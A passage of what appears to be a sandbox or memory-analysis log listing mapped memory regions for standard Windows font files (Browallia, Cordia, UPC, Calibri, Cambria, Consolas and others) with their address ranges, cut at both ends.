name = "browau.ttf"
filename = "\\Windows\\Fonts\\browau.ttf" (normalized: "c:\\windows\\fonts\\browau.ttf")
Region:
id = 732
start_va = 0x8b0000
end_va = 0x8c8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browaui.ttf"
filename = "\\Windows\\Fonts\\browaui.ttf" (normalized: "c:\\windows\\fonts\\browaui.ttf")
Region:
id = 733
start_va = 0x8b0000
end_va = 0x8c8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browaui.ttf"
filename = "\\Windows\\Fonts\\browaui.ttf" (normalized: "c:\\windows\\fonts\\browaui.ttf")
Region:
id = 734
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browaub.ttf"
filename = "\\Windows\\Fonts\\browaub.ttf" (normalized: "c:\\windows\\fonts\\browaub.ttf")
Region:
id = 735
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browaub.ttf"
filename = "\\Windows\\Fonts\\browaub.ttf" (normalized: "c:\\windows\\fonts\\browaub.ttf")
Region:
id = 736
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browauz.ttf"
filename = "\\Windows\\Fonts\\browauz.ttf" (normalized: "c:\\windows\\fonts\\browauz.ttf")
Region:
id = 737
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browauz.ttf"
filename = "\\Windows\\Fonts\\browauz.ttf" (normalized: "c:\\windows\\fonts\\browauz.ttf")
Region:
id = 738
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiau.ttf"
filename = "\\Windows\\Fonts\\cordiau.ttf" (normalized: "c:\\windows\\fonts\\cordiau.ttf")
Region:
id = 739
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiau.ttf"
filename = "\\Windows\\Fonts\\cordiau.ttf" (normalized: "c:\\windows\\fonts\\cordiau.ttf")
Region:
id = 740
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiaub.ttf"
filename = "\\Windows\\Fonts\\cordiaub.ttf" (normalized: "c:\\windows\\fonts\\cordiaub.ttf")
Region:
id = 741
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiaub.ttf"
filename = "\\Windows\\Fonts\\cordiaub.ttf" (normalized: "c:\\windows\\fonts\\cordiaub.ttf")
Region:
id = 742
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiauz.ttf"
filename = "\\Windows\\Fonts\\cordiauz.ttf" (normalized: "c:\\windows\\fonts\\cordiauz.ttf")
Region:
id = 743
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiauz.ttf"
filename = "\\Windows\\Fonts\\cordiauz.ttf" (normalized: "c:\\windows\\fonts\\cordiauz.ttf")
Region:
id = 744
start_va = 0x8b0000
end_va = 0x8c8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiaui.ttf"
filename = "\\Windows\\Fonts\\cordiaui.ttf" (normalized: "c:\\windows\\fonts\\cordiaui.ttf")
Region:
id = 745
start_va = 0x8b0000
end_va = 0x8c8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiaui.ttf"
filename = "\\Windows\\Fonts\\cordiaui.ttf" (normalized: "c:\\windows\\fonts\\cordiaui.ttf")
Region:
id = 746
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcdl.ttf"
filename = "\\Windows\\Fonts\\upcdl.ttf" (normalized: "c:\\windows\\fonts\\upcdl.ttf")
Region:
id = 747
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcdl.ttf"
filename = "\\Windows\\Fonts\\upcdl.ttf" (normalized: "c:\\windows\\fonts\\upcdl.ttf")
Region:
id = 748
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcdi.ttf"
filename = "\\Windows\\Fonts\\upcdi.ttf" (normalized: "c:\\windows\\fonts\\upcdi.ttf")
Region:
id = 749
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcdi.ttf"
filename = "\\Windows\\Fonts\\upcdi.ttf" (normalized: "c:\\windows\\fonts\\upcdi.ttf")
Region:
id = 750
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcdb.ttf"
filename = "\\Windows\\Fonts\\upcdb.ttf" (normalized: "c:\\windows\\fonts\\upcdb.ttf")
Region:
id = 751
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcdb.ttf"
filename = "\\Windows\\Fonts\\upcdb.ttf" (normalized: "c:\\windows\\fonts\\upcdb.ttf")
Region:
id = 752
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcdbi.ttf"
filename = "\\Windows\\Fonts\\upcdbi.ttf" (normalized: "c:\\windows\\fonts\\upcdbi.ttf")
Region:
id = 753
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcdbi.ttf"
filename = "\\Windows\\Fonts\\upcdbi.ttf" (normalized: "c:\\windows\\fonts\\upcdbi.ttf")
Region:
id = 754
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcel.ttf"
filename = "\\Windows\\Fonts\\upcel.ttf" (normalized: "c:\\windows\\fonts\\upcel.ttf")
Region:
id = 755
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcel.ttf"
filename = "\\Windows\\Fonts\\upcel.ttf" (normalized: "c:\\windows\\fonts\\upcel.ttf")
Region:
id = 756
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcei.ttf"
filename = "\\Windows\\Fonts\\upcei.ttf" (normalized: "c:\\windows\\fonts\\upcei.ttf")
Region:
id = 757
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcei.ttf"
filename = "\\Windows\\Fonts\\upcei.ttf" (normalized: "c:\\windows\\fonts\\upcei.ttf")
Region:
id = 758
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upceb.ttf"
filename = "\\Windows\\Fonts\\upceb.ttf" (normalized: "c:\\windows\\fonts\\upceb.ttf")
Region:
id = 759
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upceb.ttf"
filename = "\\Windows\\Fonts\\upceb.ttf" (normalized: "c:\\windows\\fonts\\upceb.ttf")
Region:
id = 760
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcebi.ttf"
filename = "\\Windows\\Fonts\\upcebi.ttf" (normalized: "c:\\windows\\fonts\\upcebi.ttf")
Region:
id = 761
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcebi.ttf"
filename = "\\Windows\\Fonts\\upcebi.ttf" (normalized: "c:\\windows\\fonts\\upcebi.ttf")
Region:
id = 762
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcfl.ttf"
filename = "\\Windows\\Fonts\\upcfl.ttf" (normalized: "c:\\windows\\fonts\\upcfl.ttf")
Region:
id = 763
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcfl.ttf"
filename = "\\Windows\\Fonts\\upcfl.ttf" (normalized: "c:\\windows\\fonts\\upcfl.ttf")
Region:
id = 764
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcfi.ttf"
filename = "\\Windows\\Fonts\\upcfi.ttf" (normalized: "c:\\windows\\fonts\\upcfi.ttf")
Region:
id = 765
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcfi.ttf"
filename = "\\Windows\\Fonts\\upcfi.ttf" (normalized: "c:\\windows\\fonts\\upcfi.ttf")
Region:
id = 766
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcfb.ttf"
filename = "\\Windows\\Fonts\\upcfb.ttf" (normalized: "c:\\windows\\fonts\\upcfb.ttf")
Region:
id = 767
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcfb.ttf"
filename = "\\Windows\\Fonts\\upcfb.ttf" (normalized: "c:\\windows\\fonts\\upcfb.ttf")
Region:
id = 768
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcfbi.ttf"
filename = "\\Windows\\Fonts\\upcfbi.ttf" (normalized: "c:\\windows\\fonts\\upcfbi.ttf")
Region:
id = 769
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcfbi.ttf"
filename = "\\Windows\\Fonts\\upcfbi.ttf" (normalized: "c:\\windows\\fonts\\upcfbi.ttf")
Region:
id = 770
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcil.ttf"
filename = "\\Windows\\Fonts\\upcil.ttf" (normalized: "c:\\windows\\fonts\\upcil.ttf")
Region:
id = 771
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcil.ttf"
filename = "\\Windows\\Fonts\\upcil.ttf" (normalized: "c:\\windows\\fonts\\upcil.ttf")
Region:
id = 772
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcii.ttf"
filename = "\\Windows\\Fonts\\upcii.ttf" (normalized: "c:\\windows\\fonts\\upcii.ttf")
Region:
id = 773
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcii.ttf"
filename = "\\Windows\\Fonts\\upcii.ttf" (normalized: "c:\\windows\\fonts\\upcii.ttf")
Region:
id = 774
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcib.ttf"
filename = "\\Windows\\Fonts\\upcib.ttf" (normalized: "c:\\windows\\fonts\\upcib.ttf")
Region:
id = 775
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcib.ttf"
filename = "\\Windows\\Fonts\\upcib.ttf" (normalized: "c:\\windows\\fonts\\upcib.ttf")
Region:
id = 776
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcibi.ttf"
filename = "\\Windows\\Fonts\\upcibi.ttf" (normalized: "c:\\windows\\fonts\\upcibi.ttf")
Region:
id = 777
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcibi.ttf"
filename = "\\Windows\\Fonts\\upcibi.ttf" (normalized: "c:\\windows\\fonts\\upcibi.ttf")
Region:
id = 778
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcjl.ttf"
filename = "\\Windows\\Fonts\\upcjl.ttf" (normalized: "c:\\windows\\fonts\\upcjl.ttf")
Region:
id = 779
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcjl.ttf"
filename = "\\Windows\\Fonts\\upcjl.ttf" (normalized: "c:\\windows\\fonts\\upcjl.ttf")
Region:
id = 780
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcji.ttf"
filename = "\\Windows\\Fonts\\upcji.ttf" (normalized: "c:\\windows\\fonts\\upcji.ttf")
Region:
id = 781
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcji.ttf"
filename = "\\Windows\\Fonts\\upcji.ttf" (normalized: "c:\\windows\\fonts\\upcji.ttf")
Region:
id = 782
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcjb.ttf"
filename = "\\Windows\\Fonts\\upcjb.ttf" (normalized: "c:\\windows\\fonts\\upcjb.ttf")
Region:
id = 783
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcjb.ttf"
filename = "\\Windows\\Fonts\\upcjb.ttf" (normalized: "c:\\windows\\fonts\\upcjb.ttf")
Region:
id = 784
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcjbi.ttf"
filename = "\\Windows\\Fonts\\upcjbi.ttf" (normalized: "c:\\windows\\fonts\\upcjbi.ttf")
Region:
id = 785
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcjbi.ttf"
filename = "\\Windows\\Fonts\\upcjbi.ttf" (normalized: "c:\\windows\\fonts\\upcjbi.ttf")
Region:
id = 786
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upckl.ttf"
filename = "\\Windows\\Fonts\\upckl.ttf" (normalized: "c:\\windows\\fonts\\upckl.ttf")
Region:
id = 787
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upckl.ttf"
filename = "\\Windows\\Fonts\\upckl.ttf" (normalized: "c:\\windows\\fonts\\upckl.ttf")
Region:
id = 788
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcki.ttf"
filename = "\\Windows\\Fonts\\upcki.ttf" (normalized: "c:\\windows\\fonts\\upcki.ttf")
Region:
id = 789
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcki.ttf"
filename = "\\Windows\\Fonts\\upcki.ttf" (normalized: "c:\\windows\\fonts\\upcki.ttf")
Region:
id = 790
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upckb.ttf"
filename = "\\Windows\\Fonts\\upckb.ttf" (normalized: "c:\\windows\\fonts\\upckb.ttf")
Region:
id = 791
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upckb.ttf"
filename = "\\Windows\\Fonts\\upckb.ttf" (normalized: "c:\\windows\\fonts\\upckb.ttf")
Region:
id = 792
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upckbi.ttf"
filename = "\\Windows\\Fonts\\upckbi.ttf" (normalized: "c:\\windows\\fonts\\upckbi.ttf")
Region:
id = 793
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upckbi.ttf"
filename = "\\Windows\\Fonts\\upckbi.ttf" (normalized: "c:\\windows\\fonts\\upckbi.ttf")
Region:
id = 794
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcll.ttf"
filename = "\\Windows\\Fonts\\upcll.ttf" (normalized: "c:\\windows\\fonts\\upcll.ttf")
Region:
id = 795
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcll.ttf"
filename = "\\Windows\\Fonts\\upcll.ttf" (normalized: "c:\\windows\\fonts\\upcll.ttf")
Region:
id = 796
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcli.ttf"
filename = "\\Windows\\Fonts\\upcli.ttf" (normalized: "c:\\windows\\fonts\\upcli.ttf")
Region:
id = 797
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upcli.ttf"
filename = "\\Windows\\Fonts\\upcli.ttf" (normalized: "c:\\windows\\fonts\\upcli.ttf")
Region:
id = 798
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upclb.ttf"
filename = "\\Windows\\Fonts\\upclb.ttf" (normalized: "c:\\windows\\fonts\\upclb.ttf")
Region:
id = 799
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upclb.ttf"
filename = "\\Windows\\Fonts\\upclb.ttf" (normalized: "c:\\windows\\fonts\\upclb.ttf")
Region:
id = 800
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upclbi.ttf"
filename = "\\Windows\\Fonts\\upclbi.ttf" (normalized: "c:\\windows\\fonts\\upclbi.ttf")
Region:
id = 801
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "upclbi.ttf"
filename = "\\Windows\\Fonts\\upclbi.ttf" (normalized: "c:\\windows\\fonts\\upclbi.ttf")
Region:
id = 802
start_va = 0x4ff0000
end_va = 0x54e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kaiu.ttf"
filename = "\\Windows\\Fonts\\kaiu.ttf" (normalized: "c:\\windows\\fonts\\kaiu.ttf")
Region:
id = 803
start_va = 0x4ff0000
end_va = 0x54e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kaiu.ttf"
filename = "\\Windows\\Fonts\\kaiu.ttf" (normalized: "c:\\windows\\fonts\\kaiu.ttf")
Region:
id = 804
start_va = 0x970000
end_va = 0x9bffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "l_10646.ttf"
filename = "\\Windows\\Fonts\\l_10646.ttf" (normalized: "c:\\windows\\fonts\\l_10646.ttf")
Region:
id = 805
start_va = 0x970000
end_va = 0x9bffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "l_10646.ttf"
filename = "\\Windows\\Fonts\\l_10646.ttf" (normalized: "c:\\windows\\fonts\\l_10646.ttf")
Region:
id = 806
start_va = 0x8b0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariblk.ttf"
filename = "\\Windows\\Fonts\\ariblk.ttf" (normalized: "c:\\windows\\fonts\\ariblk.ttf")
Region:
id = 807
start_va = 0x8b0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariblk.ttf"
filename = "\\Windows\\Fonts\\ariblk.ttf" (normalized: "c:\\windows\\fonts\\ariblk.ttf")
Region:
id = 808
start_va = 0xee0000
end_va = 0xfa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibri.ttf"
filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf")
Region:
id = 809
start_va = 0xee0000
end_va = 0xfa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibri.ttf"
filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf")
Region:
id = 810
start_va = 0xee0000
end_va = 0xfb0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibrii.ttf"
filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf")
Region:
id = 811
start_va = 0xee0000
end_va = 0xfb0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibrii.ttf"
filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf")
Region:
id = 812
start_va = 0xee0000
end_va = 0xfaffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibrib.ttf"
filename = "\\Windows\\Fonts\\calibrib.ttf" (normalized: "c:\\windows\\fonts\\calibrib.ttf")
Region:
id = 813
start_va = 0xee0000
end_va = 0xfaffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibrib.ttf"
filename = "\\Windows\\Fonts\\calibrib.ttf" (normalized: "c:\\windows\\fonts\\calibrib.ttf")
Region:
id = 814
start_va = 0xee0000
end_va = 0xfbbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibriz.ttf"
filename = "\\Windows\\Fonts\\calibriz.ttf" (normalized: "c:\\windows\\fonts\\calibriz.ttf")
Region:
id = 815
start_va = 0xee0000
end_va = 0xfbbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibriz.ttf"
filename = "\\Windows\\Fonts\\calibriz.ttf" (normalized: "c:\\windows\\fonts\\calibriz.ttf")
Region:
id = 816
start_va = 0x4ff0000
end_va = 0x517cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cambria.ttc"
filename = "\\Windows\\Fonts\\cambria.ttc" (normalized: "c:\\windows\\fonts\\cambria.ttc")
Region:
id = 817
start_va = 0x4ff0000
end_va = 0x517cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cambria.ttc"
filename = "\\Windows\\Fonts\\cambria.ttc" (normalized: "c:\\windows\\fonts\\cambria.ttc")
Region:
id = 818
start_va = 0x4ff0000
end_va = 0x517cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cambria.ttc"
filename = "\\Windows\\Fonts\\cambria.ttc" (normalized: "c:\\windows\\fonts\\cambria.ttc")
Region:
id = 819
start_va = 0xee0000
end_va = 0xfa9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cambriai.ttf"
filename = "\\Windows\\Fonts\\cambriai.ttf" (normalized: "c:\\windows\\fonts\\cambriai.ttf")
Region:
id = 820
start_va = 0xee0000
end_va = 0xfa9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cambriai.ttf"
filename = "\\Windows\\Fonts\\cambriai.ttf" (normalized: "c:\\windows\\fonts\\cambriai.ttf")
Region:
id = 821
start_va = 0xee0000
end_va = 0xfa1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cambriab.ttf"
filename = "\\Windows\\Fonts\\cambriab.ttf" (normalized: "c:\\windows\\fonts\\cambriab.ttf")
Region:
id = 822
start_va = 0xee0000
end_va = 0xfa1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cambriab.ttf"
filename = "\\Windows\\Fonts\\cambriab.ttf" (normalized: "c:\\windows\\fonts\\cambriab.ttf")
Region:
id = 823
start_va = 0xee0000
end_va = 0xfa4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cambriaz.ttf"
filename = "\\Windows\\Fonts\\cambriaz.ttf" (normalized: "c:\\windows\\fonts\\cambriaz.ttf")
Region:
id = 824
start_va = 0xee0000
end_va = 0xfa4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cambriaz.ttf"
filename = "\\Windows\\Fonts\\cambriaz.ttf" (normalized: "c:\\windows\\fonts\\cambriaz.ttf")
Region:
id = 825
start_va = 0x8b0000
end_va = 0x8e5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "candara.ttf"
filename = "\\Windows\\Fonts\\Candara.ttf" (normalized: "c:\\windows\\fonts\\candara.ttf")
Region:
id = 826
start_va = 0x8b0000
end_va = 0x8e5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "candara.ttf"
filename = "\\Windows\\Fonts\\Candara.ttf" (normalized: "c:\\windows\\fonts\\candara.ttf")
Region:
id = 827
start_va = 0x8b0000
end_va = 0x8e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "candarai.ttf"
filename = "\\Windows\\Fonts\\Candarai.ttf" (normalized: "c:\\windows\\fonts\\candarai.ttf")
Region:
id = 828
start_va = 0x8b0000
end_va = 0x8e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "candarai.ttf"
filename = "\\Windows\\Fonts\\Candarai.ttf" (normalized: "c:\\windows\\fonts\\candarai.ttf")
Region:
id = 829
start_va = 0x8b0000
end_va = 0x8e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "candarab.ttf"
filename = "\\Windows\\Fonts\\Candarab.ttf" (normalized: "c:\\windows\\fonts\\candarab.ttf")
Region:
id = 830
start_va = 0x8b0000
end_va = 0x8e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "candarab.ttf"
filename = "\\Windows\\Fonts\\Candarab.ttf" (normalized: "c:\\windows\\fonts\\candarab.ttf")
Region:
id = 831
start_va = 0x8b0000
end_va = 0x8e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "candaraz.ttf"
filename = "\\Windows\\Fonts\\Candaraz.ttf" (normalized: "c:\\windows\\fonts\\candaraz.ttf")
Region:
id = 832
start_va = 0x8b0000
end_va = 0x8e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "candaraz.ttf"
filename = "\\Windows\\Fonts\\Candaraz.ttf" (normalized: "c:\\windows\\fonts\\candaraz.ttf")
Region:
id = 833
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "comic.ttf"
filename = "\\Windows\\Fonts\\comic.ttf" (normalized: "c:\\windows\\fonts\\comic.ttf")
Region:
id = 834
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "comic.ttf"
filename = "\\Windows\\Fonts\\comic.ttf" (normalized: "c:\\windows\\fonts\\comic.ttf")
Region:
id = 835
start_va = 0x8b0000
end_va = 0x8ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "comicbd.ttf"
filename = "\\Windows\\Fonts\\comicbd.ttf" (normalized: "c:\\windows\\fonts\\comicbd.ttf")
Region:
id = 836
start_va = 0x8b0000
end_va = 0x8ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "comicbd.ttf"
filename = "\\Windows\\Fonts\\comicbd.ttf" (normalized: "c:\\windows\\fonts\\comicbd.ttf")
Region:
id = 837
start_va = 0x970000
end_va = 0x9c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "consola.ttf"
filename = "\\Windows\\Fonts\\consola.ttf" (normalized: "c:\\windows\\fonts\\consola.ttf")
Region:
id = 838
start_va = 0x970000
end_va = 0x9c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "consola.ttf"
filename = "\\Windows\\Fonts\\consola.ttf" (normalized: "c:\\windows\\fonts\\consola.ttf")
Region:
id = 839
start_va = 0x970000
end_va = 0x9c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "consolai.ttf"
filename = "\\Windows\\Fonts\\consolai.ttf" (normalized: "c:\\windows\\fonts\\consolai.ttf")
Region:
id = 840
start_va = 0x970000
end_va = 0x9c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "consolai.ttf"
filename = "\\Windows\\Fonts\\consolai.ttf" (normalized: "c:\\windows\\fonts\\consolai.ttf")
Region:
id = 841
start_va = 0x970000
end_va = 0x9c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "consolab.ttf"
filename = "\\Windows\\Fonts\\consolab.ttf" (normalized: "c:\\windows\\fonts\\consolab.ttf")
Region:
id = 842
start_va = 0x970000
end_va = 0x9c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "consolab.ttf"
filename = "\\Windows\\Fonts\\consolab.ttf" (normalized: "c:\\windows\\fonts\\consolab.ttf")
Region:
id = 843
start_va = 0x970000
end_va = 0x9cbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "consolaz.ttf"
filename = "\\Windows\\Fonts\\consolaz.ttf" (normalized: "c:\\windows\\fonts\\consolaz.ttf")
Region:
id = 844
start_va = 0x970000
end_va = 0x9cbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "consolaz.ttf"
filename = "\\Windows\\Fonts\\consolaz.ttf" (normalized: "c:\\windows\\fonts\\consolaz.ttf")
Region:
id = 845
start_va = 0x970000
end_va = 0x9ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "constan.ttf"
filename = "\\Windows\\Fonts\\constan.ttf" (normalized: "c:\\windows\\fonts\\constan.ttf")
Region:
id = 846
start_va = 0x970000
end_va = 0x9ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "constan.ttf"
filename = "\\Windows\\Fonts\\constan.ttf" (normalized: "c:\\windows\\fonts\\constan.ttf")
Region:
id = 847
start_va = 0x970000
end_va = 0x9ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "constani.ttf"
filename = "\\Windows\\Fonts\\constani.ttf" (normalized: "c:\\windows\\fonts\\constani.ttf")
Region:
id = 848
start_va = 0x970000
end_va = 0x9ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "constani.ttf"
filename = "\\Windows\\Fonts\\constani.ttf" (normalized: "c:\\windows\\fonts\\constani.ttf")
Region:
id = 849
start_va = 0x970000
end_va = 0x9defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "constanb.ttf"
